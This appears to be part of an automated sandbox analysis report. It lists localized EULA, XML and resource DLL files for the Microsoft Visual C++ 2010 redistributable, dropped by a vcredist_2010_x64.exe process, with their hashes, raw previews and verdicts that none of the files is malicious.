Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l...............{%......{".....Rich............PE..L...0<_M.........."!.........(...............................................P......).....@.......................................... ...%...........*..X............................................................................................text...G...........................@..@.rsrc....%... ...&..................@..@............0<_M........+...........RSDS..{.9..H...S-.>B....SetupResources.pdb..................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\4863269369430a9b27\1033\eula.rtf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	Rich Text Format data, version 1, ANSI
Category:	dropped
Size (bytes):	7346
Entropy (8bit):	4.957730247487973
Encrypted:	false
SSDEEP:	192:Ff9lHdwOQnTl2QpecglQREe931lGGgi2k90vuE9HSH/c2:bQOQnI6glQRjlGGgi24JAyE2
MD5:	0D0269DFD3FFA37529A14953A5891964
SHA1:	F4FD2C37B8AA22C1083210508DD35CB7665A36A5
SHA-256:	6BAB6A941CF861BE226207A02D2DCE79E007FA4368CF638EBBB6F6A762646729
SHA-512:	01817413168C0365B6B16A3D1A80061D94BBC8BC466528F05B42A65700847A9DE5996A8C55EC3F19FA9F35698D3790CDE572540DC7386409CB692A6A41BFC137
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\froman\fprq2\fcharset0 Times New Roman;}{\f3\fnil\fcharset0 Calibri;}}..{\colortbl ;\red0\green0\blue255;}..{\stylesheet{ Normal;}{\s1 heading 1;}{\s2 heading 2;}}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\b\f0\fs20 MICROSOFT SOFTWARE LICENSE TERMS\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120 MICROSOFT VISUAL C++ 2010 RUNTIME LIBRARIES WITH SERVICE PACK 1\par..\pard\nowidctlpar\sb120\sa120\b0 These license terms are an agreement between Microsoft Corporation (or based on where you live, one of its affiliates) and you. Please read them. They apply to the software named above, which includes the media on which you received it, if any. The terms also apply to any Microsoft\par..\pard\nowidctlpar\fi-360\li360\sb120\sa120\tx360\f1\'b7\tab\f0 updates,\par..\pard\nowidctlpar\fi-360\li360\sb120\sa120\f1\'b7\tab\

C:\4863269369430a9b27\1036\LocalizedData.xml

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	41290
Entropy (8bit):	3.5546073625344863
Encrypted:	false
SSDEEP:	192:4GrYAiJoFb1Z0eQiFaD4EbJeiI5l9Mg5oBknXoFXYnZCoroUnAJJFHq20/kFR/HU:4GZwoR1c5ryz7HIJR0kbG52gjfVv
MD5:	30DD04CE53B3F5D9363ADE0359E3E0B2
SHA1:	56BC3301013A2D0B08ECD38FF0A22B1040EF558E
SHA-256:	BF03073E0E939F3598AEB9AA19B655A24C4AD31F96065D6DC60F7C4DF78653BA
SHA-512:	9CB1FF9BA0DC018F9E1BD301FBCB9E5C561F6A14C65290EBC0FE67CBDF59D1A09898A2F802C52339C10942C819EBB4BDD8B4C7F5F4F78AF95F7C893641E41A34
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.X.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".C.e. .p.r.o.g.r.a.m.m.e. .d.'.i.n.s.t.a.l.l.a.t.i.o.n. .r.e.q.u.i.e.r.t. .u.n.e. .p.l.a.t.e.f.o.r.m.e. .x.6.4... .I.l. .n.e. .p.e.u.t. .p.a.s. ...t.r.e. .i.n.s.t.a.l.l... .s.u.r. .c.e.t.t.e. .p.l.a.t.e.f.o.r.m.e..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.I.A.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".C.e. .p.r.o.g.r.a.m.m.e. .d.'.i.n.s.t.a.l.l.a.t.i.o.n. .r.e.q.u.i.e.r.t. .u.n.e. .p.l.a.t.e.f.o.r.m.e. .I.A.6.4... .I.l. .n.e. .p.e.u.t. .p.a.s. ...t.r.e. .i.n.s.t.a.

C:\4863269369430a9b27\1036\SetupResources.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18264
Entropy (8bit):	5.215421096962445
Encrypted:	false
SSDEEP:	384:y7s6rAY9li3OoDDkb6Wp9eWBLXci2jpvmm:yzfiZDgTlMi2jpvmm
MD5:	E35532C4BB5B1CFC4E6808599C090405
SHA1:	72B8B5A31499D8E4B42D34A4BA23E98C2615483E
SHA-256:	009878ADCD858C2289BB313966F9716FC3868A7EB0915772C3D7CB76E67CA6FB
SHA-512:	6AFD3ACB62E7A5C9BAFFB7D6890793F08B40DF35EB913CBAD3D50DEF8CD506A569A723ACDC08C7F9CAA05A264A421DBDCB09E5346E026BEDDD9A0AD8C11FA16B
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l...............{%......{".....Rich............PE..L...0<_M.........."!.........................................................P...........@.......................................... ...+...........0..X............................................................................................text...G...........................@..@.rsrc....0... ...,..................@..@............0<_M........+...........RSDS..{.9..H...S-.>B....SetupResources.pdb..................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\4863269369430a9b27\1036\eula.rtf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	Rich Text Format data, version 1, ANSI
Category:	dropped
Size (bytes):	8833
Entropy (8bit):	5.13980517558444
Encrypted:	false
SSDEEP:	192:LfPlz+1WZ0a5+dAKkvY+8QE3clI6/JK3aE66i8UKjxb1c2OjL8Nr7FaF5c2:rw1WKa5+dAKkvY+8QEMlI6Q3PIX034se
MD5:	6A03E425EC71137AF114A5AAB2999B18
SHA1:	794A1D545DDED6CDC355449DD72F0A8A8303C4D2
SHA-256:	495BBBEC333AC355DEEAE48A56DAD9A3CEB7CDBD2FB28712EE628A26FA539320
SHA-512:	E12648B8B37002057C83581ECC5209490A98D37CAE850EAB0C035ED6640BE130238ECDB72195DEEF03BF8E71C3E6EDADB79276C1DB030BF0BF3DD8301DA9077C
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\froman\fprq2\fcharset2 Symbol;}{\f3\fnil\fcharset0 Calibri;}}..{\colortbl ;\red0\green0\blue255;}..{\stylesheet{ Normal;}{\s1 heading 1;}{\s2 heading 2;}}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang1036\b\f0\fs20 TERMES DU CONTRAT DE LICENCE D\rquote UN LOGICIEL MICROSOFT\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120 MICROSOFT VISUAL C++ 2010 RUNTIME LIBRARIES WITH SERVICE PACK 1\par..\pard\nowidctlpar\sb120\sa120\b0 Les pr\'e9sents termes ont valeur de contrat entre Microsoft Corporation (ou en fonction du lieu o\'f9 vous vivez, l\rquote un de ses affili\'e9s) et vous. Lisez-les attentivement. Ils portent sur le logiciel nomm\'e9 ci-dessus, y compris le support sur lequel vous l\rquote avez re\'e7u le cas \'e9ch\'e9ant. Ce contrat porte \'e9galement sur les produits Microsoft suivants\~:\b\f1

C:\4863269369430a9b27\1040\LocalizedData.xml

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	40320
Entropy (8bit):	3.5296220359665447
Encrypted:	false
SSDEEP:	384:4h9o3CMa9e1yzNZNs4fLCAEJ0o5H/PuRv:9aug8J1u
MD5:	FE6B23186C2D77F7612BF7B1018A9B2A
SHA1:	1528EC7633E998F040D2D4C37AC8A7DC87F99817
SHA-256:	03BBE1A39C6716F07703D20ED7539D8BF13B87870C2C83DDDA5445C82953A80A
SHA-512:	40C9C9F3607CAB24655593FC4766829516DE33F13060BE09F5EE65578824AC600CC1C07FE71CDD48BFF7F52B447FF37C0D161D755A69AC7DB7DF118DA6DB7649
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.X.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".I.l. .p.r.o.g.r.a.m.m.a. .d.i. .i.n.s.t.a.l.l.a.z.i.o.n.e. .r.i.c.h.i.e.d.e. .u.n.a. .p.i.a.t.t.a.f.o.r.m.a. .x.6.4... .I.m.p.o.s.s.i.b.i.l.e. .e.s.e.g.u.i.r.e. .l.'.i.n.s.t.a.l.l.a.z.i.o.n.e. .s.u. .q.u.e.s.t.a. .p.i.a.t.t.a.f.o.r.m.a..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.I.A.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".I.l. .p.r.o.g.r.a.m.m.a. .d.i. .i.n.s.t.a.l.l.a.z.i.o.n.e. .r.i.c.h.i.e.d.e. .u.n.a. .p.i.a.t.t.a.f.o.r.m.a. .I.A.6.4... .I.m.p.o.s.s.i.b.i.l.

C:\4863269369430a9b27\1040\SetupResources.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17752
Entropy (8bit):	5.253439908286741
Encrypted:	false
SSDEEP:	384:o7C6Tg7AtONBKHno5JW2eWlLXci2jpvDho:okAbsX5Mi2jpv1o
MD5:	C956E591A0C801B17693AA99098E4C6D
SHA1:	B8DE448E1148E9DC9095664846EF56929C9B71A4
SHA-256:	B6CA7CE4ECF331BA1EB40B9D3BFB75A78D23A3E5DC29AD081060AB0D8822E3F5
SHA-512:	4E4F8BBA8C72CC68BD81E460A12D73D7A3A00F912EAF5A6E0140D8FC801A588617E1A32FAF6C9A3FA5FD7DD04527064AF8969156214A37B90A7C193DCC59CAD2
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l...............{%......{".....Rich............PE..L...0<_M.........."!.........,...............................................P......S2....@.......................................... ...)..............X............................................................................................text...G...........................@..@.rsrc....0... ...*..................@..@............0<_M........+...........RSDS..{.9..H...S-.>B....SetupResources.pdb..................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\4863269369430a9b27\1040\eula.rtf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	Rich Text Format data, version 1, ANSI
Category:	dropped
Size (bytes):	9245
Entropy (8bit):	5.069998443181659
Encrypted:	false
SSDEEP:	192:Lf7laOFewwU3xr3/rhdSNj6HzLCwdi/V2VXk3rLnF2gtlH4c2:fjFhpdSczL/+V2a3rLnF2g/D2
MD5:	BEDE1C7787FEA865571A7D6F010361C5
SHA1:	3853CB9585922E86AFF886F32F6739308799E062
SHA-256:	563215712674FCEB29E04FA4BBCBBEC307FB4BE9EE15C820C46164F77D79BF16
SHA-512:	A408818DCAFF109B8972D3D287221D58405C656F4A56BD389E5044FF9EB3E3A6BD95E0C4E49D1BD36A429EF1DB168CCC77747B11397EE91436D078E81519414A
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\froman\fprq2\fcharset2 Symbol;}{\f3\fnil\fcharset0 Calibri;}}..{\colortbl ;\red0\green0\blue255;}..{\stylesheet{ Normal;}{\s1 heading 1;}{\s2 heading 2;}}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang1040\b\f0\fs20 CONTRATTO DI LICENZA PER IL SOFTWARE MICROSOFT\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120 MICROSOFT VISUAL C++ 2010 RUNTIME LIBRARIES WITH SERVICE PACK 1\par..\pard\nowidctlpar\sb120\sa120\b0 Le presenti condizioni di licenza costituiscono il contratto tra Microsoft Corporation (o, in base al luogo di residenza del licenziatario, una delle sue consociate) e il licenziatario. Il licenziatario deve leggerle con attenzione. Le presenti condizioni si applicano al software Microsoft sopra indicato, inclusi gli eventuali supporti di memorizzazione sui quali \'e8 stato ricevuto. Le presen

C:\4863269369430a9b27\1041\LocalizedData.xml

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	34294
Entropy (8bit):	4.383454074704535
Encrypted:	false
SSDEEP:	192:4O3Oo45AyAYcou3DDn6UrMhsrHZmxqJOXhNCGYHre3iR7v:4O3OoMIYcBCOXJ6koIv
MD5:	6F86B79DBF15E810331DF2CA77F1043A
SHA1:	875ED8498C21F396CC96B638911C23858ECE5B88
SHA-256:	F0F9DD1A9F164F4D2E73B4D23CC5742DA2C39549B9C4DB692283839C5313E04F
SHA-512:	CA233A6BF55E253EBF1E8180A326667438E1124F6559054B87021095EF16FFC6B0C87361E0922087BE4CA9CABD10828BE3B6CC12C4032CB7F2A317FDBD76F818
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.X.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".S0n0.0.0.0.0.0.0 ..0.0.0.0.0o0 .x.6.4. ..0.0.0.0.0.0.0n0.0.0.[a.h0W0f0D0~0Y0.0S0.0o0S0n0.0.0.0.0.0.0.0.0k0o0.0.0.0.0.0.0g0M0~0[0.0.0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.I.A.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".S0n0.0.0.0.0.0.0 ..0.0.0.0.0o0 .I.A.6.4. ..0.0.0.0.0.0.0n0.0.0.[a.h0W0f0D0~0Y0.0S0.0o0S0n0.0.0.0.0.0.0.0.0k0o0.0.0.0.0.0.0g0M0~0[0.0.0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.S.u.p.p.o.r.t.e.d.O.S.).". .L.o.c.a.l.i.

C:\4863269369430a9b27\1041\SetupResources.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15192
Entropy (8bit):	6.0685950222818965
Encrypted:	false
SSDEEP:	192:DFg6ujUfwtW1+/FuZhS5CSJk/lhQW5JEW/QKPnEtObMacxc8hjeyveCXlC2y+UNH:iUC7mS53JkNCW5JEW/LXci2jpvrCN
MD5:	00EBA8C995E91FA9C7A38221CC3C2AB2
SHA1:	353D373B66EC5B6D25A060AE69BF362202B0C069
SHA-256:	DA2514F84A5249937DD439CB608B44D7A2C152D7D4F7B4F1D2B12DB22FB29DF5
SHA-512:	7CBA82C897AFBC09E87295F7F9C9F2DB1DDB124CAFAFE5E93F46F4346BB6EC5CBF1E4A100B532E854A8089A074949014F68A77D9E43A9390D64A37875F35C586
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l...............{%......{".....Rich............PE..L...0<_M.........."!........."...............................................@............@.......................................... ..h............$..X............................................................................................text...G...........................@..@.rsrc.... ... ... ..................@..@............0<_M........+...........RSDS..{.9..H...S-.>B....SetupResources.pdb..................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\4863269369430a9b27\1041\eula.rtf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	Rich Text Format data, version 1, ANSI
Category:	dropped
Size (bytes):	24099
Entropy (8bit):	3.825803656837097
Encrypted:	false
SSDEEP:	192:3fCp7l5T9Yx8Ty+HaCECL9UumM4JEjFntEjjQD3cue6IvZ2N/Fump17D5joXSEZU:6Q+EU5heUzjKSYYecnOMFjsb6RU2
MD5:	D391858950A2E53FB7CAD0EF993A0857
SHA1:	D0C433C38A62BF0FCE4285585DBDC0BC9159F60D
SHA-256:	415336BDD86FFEEAEF7FF776717F18FA83418107851800EE0EE1FD65DDCF8A97
SHA-512:	E5AB613589BACE9BA6CA91EEB82101B49CDD6BB5E667A69F9D9EA90718041BA520955E581B3C9AC4D63D613F6FD4DA220C2C7CEC5CE1A721F4D55396DB15266B
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fswiss\fprq2\fcharset128 MS PGothic;}{\f1\fswiss\fprq2\fcharset0 Tahoma;}{\f2\froman\fprq2\fcharset0 Times New Roman;}{\f3\froman\fprq2\fcharset2 Symbol;}{\f4\fnil\fcharset0 Calibri;}}..{\colortbl ;\red0\green0\blue255;}..{\stylesheet{ Normal;}{\s1 heading 1;}{\s2 heading 2;}}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang1041\b\f0\fs20\'83\'7d\'83\'43\'83\'4e\'83\'8d\'83\'5c\'83\'74\'83\'67\lang1033\f1 \lang1041\f0\'83\'5c\'83\'74\'83\'67\'83\'45\'83\'46\'83\'41\lang1033\f1 \lang1041\f0\'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8d\'80\lang1033\f2\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\f1 MICROSOFT VISUAL C++ 2010 RUNTIME LIBRARIES WITH SERVICE PACK 1\par..\pard\nowidctlpar\sb120\sa120\lang1041\b0\f0\'96\'7b\'83\'7d\'83\'43\'83\'4e\'83\'8d\'83\'5c\'83\'74\'83\'67\lang1033\f1 \lang1041\f0\'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8d\'80\lang1033\f1 (\l

C:\4863269369430a9b27\1042\LocalizedData.xml

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	32962
Entropy (8bit):	4.366645511984528
Encrypted:	false
SSDEEP:	192:4cxsW0TwUrhmUgEMDQdCAtTN/2JWCTJSIQvPaLWL2K4oH/Drv:4cxszjrxgEMDQdpFN7IJSIQvkQvLH/Pv
MD5:	E87AD0B3BF73F3E76500F28E195F7DC0
SHA1:	716B842F6FBF6C68DC9C4E599C8182BFBB1354DC
SHA-256:	43B351419B73AC266C4B056A9C3A92F6DFA654328163814D17833A837577C070
SHA-512:	D3EA8655D42A2B0938C2189CEEAB25C29939C302C2E2205E05D6059AFC2A9B2039B21C083A7C17DA1CE5EEBDC934FF327A452034E2E715E497BCD6239395774C
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.X.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".t. .$.X. ...\.....D. .....X.$.t. .x.6.4. ......t. .D..i..... .t. ......... .$.X.`. ... ........"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.I.A.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".t. .$.X. ...\.....D. .....X.$.t. .I.A.6.4. ......t. .D..i..... .t. ......... .$.X.`. ... ........"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.S.u.p.p.o.r.t.e.d.O.S.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".t. ..... ........... .M.i.c.r.o.s.o.f.

C:\4863269369430a9b27\1042\SetupResources.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	14680
Entropy (8bit):	6.062566477695181
Encrypted:	false
SSDEEP:	192:vAwkhnUfwVWgj2sPKNS0N7gVCAkWpDeWJQKPnEtObMacxc8hjXHUz1TrONSQE:oLY6d2Kj0lgRkWpDeWJLXci2jXHUEe
MD5:	C3607B83C32851D9B5FD44F33430EA58
SHA1:	2E5181690881DF80D63466433C973E66A56105FF
SHA-256:	327269984378BC3B9EC4F4392B94F7D1347DB9C7BEAD2935A3B1898EB20B8080
SHA-512:	664528B6424F9C3DC2ED4A2EDC3CCEE02806FF48402930205055D348B65B36587E1E6516AF4A12B2DDE9C03ED6DBF06E09B3F337AF2C152A9F0D3FE078357807
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l...............{%......{".....Rich............PE..L...0<_M.........."!......... ...............................................@......3.....@.......................................... ..............."..X............................................................................................text...G...........................@..@.rsrc.... ... ......................@..@............0<_M........+...........RSDS..{.9..H...S-.>B....SetupResources.pdb..................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\4863269369430a9b27\1042\eula.rtf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	Rich Text Format data, version 1, ANSI
Category:	dropped
Size (bytes):	34291
Entropy (8bit):	4.149816302442216
Encrypted:	false
SSDEEP:	384:bhPZmmiJvqtz3QN4GPstREaUmJ9S7Syd2Io3G0h16koLHlx/z+WH2wsDwCnaZVSQ:VhmHvtns/EwW+Y/ewtCY+yVcQo4
MD5:	BF5C632A7F64FAF037FCEDDFFA79F0E1
SHA1:	4CE736E4620F34B432760A6A292303522DEDD1D5
SHA-256:	74B89881C0D953DDF6E87619E5C898DADFD113AFFBA28A2C71BE3FA0D952D7BD
SHA-512:	3516F913A74F9407495F74C1E8494C8E492AC5B4592CB08A6D880BDDEE7AECD67152C1A999DC202DDA021A94943CFD5658B14AF3DAA72F0FE7B1C63A0026EEEA
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\fswiss\fprq2\fcharset129 Gulim;}{\f2\froman\fprq2\fcharset0 Times New Roman;}{\f3\froman\fprq2\fcharset2 Symbol;}{\f4\fnil\fcharset0 Calibri;}}..{\colortbl ;\red0\green0\blue255;}..{\stylesheet{ Normal;}{\s1 heading 1;}{\s2 heading 2;}}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\b\f0\fs20 MICROSOFT \lang1042\f1\'bc\'d2\'c7\'c1\'c6\'ae\'bf\'fe\'be\'ee\lang1033\f0 \lang1042\f1\'bb\'e7\'bf\'eb\lang1033\f0 \lang1042\f1\'c1\'b6\'b0\'c7\lang1033\f2\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\f0 MICROSOFT VISUAL C++ 2010 RUNTIME LIBRARIES WITH SERVICE PACK 1\f2\par..\pard\nowidctlpar\sb120\sa120\lang1042\b0\f1\'ba\'bb\lang1033\f0 \lang1042\f1\'bb\'e7\'bf\'eb\lang1033\f0 \lang1042\f1\'c1\'b6\'b0\'c7\'c0\'ba\lang1033\f0 Microsoft Corporation(\lang1042\f1\'b6\'c7\'b4\'c2\lang1033\f0 \lang1042\f1\'b0\'c5\'c1\'d6\lang1033\f0 \lang1042\f1\'c1\'f

C:\4863269369430a9b27\1049\LocalizedData.xml

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	40428
Entropy (8bit):	4.233211278958208
Encrypted:	false
SSDEEP:	384:4qwoGD2VLQa0inkyZfrOh+++NA3aJW5cGUT3CT+v:DVVJl
MD5:	1290BE72ED991A3A800A6B2A124073B2
SHA1:	DAC09F9F2CCB3B273893B653F822E3DFC556D498
SHA-256:	6BA9A2E4A6A58F5BB792947990E51BABD9D5151A7057E1A051CB007FEA2EB41C
SHA-512:	C0B8B4421FCB2AABE2C8C8773FD03842E3523BF2B75D6262FD8BD952ADC12C06541BDAE0219E89F9F9F8D79567A4FE4DFF99529366C4A7C5BF66C218431F3217
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.X.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."...;.O. .M.B.>.9. .?.@.>.3.@.0.<.<.K. .C.A.B.0.=.>.2.:.8. .B.@.5.1.C.5.B.A.O. .?.;.0.B.D.>.@.<.0. .x.6.4... ...5. .=.5.;.L.7.O. .C.A.B.0.=.>.2.8.B.L. .=.0. .4.0.=.=.C.N. .?.;.0.B.D.>.@.<.C..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.I.A.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."...;.O. .M.B.>.9. .?.@.>.3.@.0.<.<.K. .C.A.B.0.=.>.2.:.8. .B.@.5.1.C.5.B.A.O. .?.;.0.B.D.>.@.<.0. .I.A.6.4... ...5. .=.5.;.L.7.O. 